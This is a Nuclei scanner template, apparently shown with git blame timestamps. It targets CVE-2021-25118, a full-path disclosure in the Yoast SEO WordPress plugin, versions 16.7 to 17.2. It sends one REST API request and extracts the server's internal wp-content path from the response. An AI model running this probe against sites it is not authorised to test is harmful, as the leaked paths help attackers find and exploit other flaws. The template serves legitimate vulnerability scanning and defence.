nuclei-templates/http/cves/2021/CVE-2021-25118.yaml

58 lines
1.9 KiB
YAML
Raw Normal View History

2022-04-30 20:40:38 +00:00
id: CVE-2021-25118
info:
name: Yoast SEO 16.7-17.2 - Information Disclosure
2022-04-30 20:40:38 +00:00
author: DhiyaneshDK
severity: medium
description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the target system.
2023-09-06 12:09:01 +00:00
remediation: Fixed in version 17.3.
2022-04-30 20:40:38 +00:00
reference:
- https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
- https://plugins.trac.wordpress.org/changeset/2608691
- https://nvd.nist.gov/vuln/detail/CVE-2021-25118
- https://github.com/20142995/sectool
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-25118
cwe-id: CWE-200
epss-score: 0.00173
epss-percentile: 0.5348
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: yoast
product: yoast_seo
2023-09-06 12:09:01 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast
2022-04-30 20:40:38 +00:00
http:
2022-04-30 20:40:38 +00:00
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"
2022-04-30 20:50:08 +00:00
2022-04-30 20:40:38 +00:00
matchers-condition: and
matchers:
- type: word
2022-04-30 20:50:08 +00:00
part: header
2022-04-30 20:40:38 +00:00
words:
- "application/json"
2023-07-11 19:49:27 +00:00
- type: regex
regex:
- '"path":"(.*)/wp-content\\(.*)","size'
2022-04-30 20:50:08 +00:00
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"path":"(.*)/wp-content\\(.*)","size'
2023-07-11 19:49:27 +00:00
part: body
# digest: 4a0a00473045022100ba7a661218a1675b4be3d3970f6130b049f1a01cdf39b787b6305b14f5d7890302206dac7b754b0ebb88e2061818cbef0180bf4b74b44844829f6821143b16255802:922c64590222798bb761d5b6d8e72950